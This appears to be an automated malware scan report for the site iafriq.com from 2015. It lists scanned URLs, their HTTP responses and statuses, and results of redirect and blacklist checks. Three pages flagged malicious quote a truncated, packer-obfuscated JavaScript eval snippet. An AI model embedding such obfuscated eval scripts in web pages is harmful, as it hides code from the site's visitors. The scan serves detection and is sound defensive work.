Scanned pages/files
Request | Server response | Status |
http://www.iafriq.com/ | 200 OK Content-Length: 177655 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var postperpage=5; var numshowpage=2; var upPageWord ='� Previous'; var downPageWord ='Next �'; var urlactivepage=location.href; var home_page="/"; Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('66(5X(p,a,c,k,e,d){e=5X(c){5Y(c<a?\'\':e(6a(c/a)))+((c=c%a)>35?60.67(c+29):c.69(36))};5Z(!\'\'.63(/^/,60)){61(c--){d[e(c)]=k[c]||e(c)}k=[5X(e){5Y d[e]}];e=5X(){5Y\'\\\\w+\'};c=1};61(c--){5Z(k[c]){p=p.63(64 65(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}5Y p}(\'5s(2Z(p,a,c,k,e, Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js | 200 OK Content-Length: 93868 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://platform.twitter.com/widgets.js | 200 OK Content-Length: 115360 Content-Type: application/javascript | clean |
http://yourjavascript.com/013114168722/recentcomments.js | 200 OK Content-Length: 2200 Content-Type: text/javascript | clean |
http://www.iafriq.com/feeds/comments/default?alt=json&callback=latest_recent_comments&max-results=4 | 200 OK Content-Length: 9522 Content-Type: text/javascript | clean |
http://feedjit.com/serve/?vv=1515&tft=3&dd=0&wid=&pid=0&proid=0&bc=FFFFFF&tc=575757&brd1=000000&lnk=4392E6&hc=FFFFFF&hfc=080708&btn=B51010&ww=200&wne=10&srefs=0 | 200 OK Content-Length: 44273 Content-Type: application/x-javascript | clean |
http://googledrive.com/host/0BzhmjN6UOoj5bllHaWFIa2Z1Z0U | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, no-store, max-age=0, must-revalidate Connection: close Date: Wed, 04 Mar 2015 20:42:13 GMT Pragma: no-cache Accept-Ranges: none Location: https://googledrive.com/host/0BzhmjN6UOoj5bllHaWFIa2Z1Z0U Server: GSE Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Fri, 01 Jan 1990 00:00:00 GMT Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, GData-Version, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, Slug, Transfer-Encoding, X-ClientDetails, X-GData-Client, X-GData-Key, X-Goog-AuthUser, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Experiments, x-goog-iam-role, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, X-Goog-Visitor-Id, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Origin, X-Referer, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp Access-Control-Allow-Methods: GET,OPTIONS Access-Control-Allow-Origin: * Alternate-Protocol: 80:quic,p=0.08 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block | clean |
https://googledrive.com/host/0bzhmjn6uooj5bllhawfia2z1z0u | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, no-store, max-age=0, must-revalidate Connection: close Date: Wed, 04 Mar 2015 20:42:13 GMT Pragma: no-cache Accept-Ranges: none Location: https://ad86e7ebad1812f261b890d7812306cbc1bc581e.googledrive.com/host/0bzhmjn6uooj5bllhawfia2z1z0u Server: GSE Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Expires: Fri, 01 Jan 1990 00:00:00 GMT Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, GData-Version, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, Slug, Transfer-Encoding, X-ClientDetails, X-GData-Client, X-GData-Key, X-Goog-AuthUser, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Experiments, x-goog-iam-role, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, X-Goog-Visitor-Id, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Origin, X-Referer, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp Access-Control-Allow-Methods: GET,OPTIONS Access-Control-Allow-Origin: * Alternate-Protocol: 443:quic,p=0.08 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block | clean |
https://ad86e7ebad1812f261b890d7812306cbc1bc581e.googledrive.com/host/0bzhmjn6uooj5bllhawfia2z1z0u | 404 Not Found Content-Length: 1413 Content-Type: text/html | clean |
https://ad86e7ebad1812f261b890d7812306cbc1bc581e.googledrive.com//www.google.com/ | 404 Not Found Content-Length: 1413 Content-Type: text/html | clean |
http://ad86e7ebad1812f261b890d7812306cbc1bc581e.googledrive.com/test404page.js | 404 Not Found Content-Length: 1413 Content-Type: text/html | clean |
http://ad86e7ebad1812f261b890d7812306cbc1bc581e.googledrive.com//www.google.com/ | 404 Not Found Content-Length: 1413 Content-Type: text/html | clean |
https://www.blogger.com/static/v1/widgets/2773501920-widgets.js | 200 OK Content-Length: 90097 Content-Type: text/javascript | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12790 Content-Type: application/javascript | clean |
http://www.iafriq.com//www.google.com/ | 404 Not Found Content-Length: 123402 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var postperpage=5; var numshowpage=2; var upPageWord ='� Previous'; var downPageWord ='Next �'; var urlactivepage=location.href; var home_page="/"; Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('66(5X(p,a,c,k,e,d){e=5X(c){5Y(c<a?\'\':e(6a(c/a)))+((c=c%a)>35?60.67(c+29):c.69(36))};5Z(!\'\'.63(/^/,60)){61(c--){d[e(c)]=k[c]||e(c)}k=[5X(e){5Y d[e]}];e=5X(){5Y\'\\\\w+\'};c=1};61(c--){5Z(k[c]){p=p.63(64 65(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}5Y p}(\'5s(2Z(p,a,c,k,e, Antivirus reports:
| ||
http://www.iafriq.com/p/innovation.html | 200 OK Content-Length: 165954 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var postperpage=5; var numshowpage=2; var upPageWord ='� Previous'; var downPageWord ='Next �'; var urlactivepage=location.href; var home_page="/"; Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('66(5X(p,a,c,k,e,d){e=5X(c){5Y(c<a?\'\':e(6a(c/a)))+((c=c%a)>35?60.67(c+29):c.69(36))};5Z(!\'\'.63(/^/,60)){61(c--){d[e(c)]=k[c]||e(c)}k=[5X(e){5Y d[e]}];e=5X(){5Y\'\\\\w+\'};c=1};61(c--){5Z(k[c]){p=p.63(64 65(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}5Y p}(\'5s(2Z(p,a,c,k,e, Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: iafriq.com
Result:
GET / HTTP/1.1
Host: iafriq.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: iafriq.com
Referer: http://www.google.com/search?q=iafriq.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: iafriq.com
Referer: http://www.google.com/search?q=iafriq.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=iafriq.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://iafriq.com/
Result: iafriq.com is not infected or malware details are not published yet.
Result: iafriq.com is not infected or malware details are not published yet.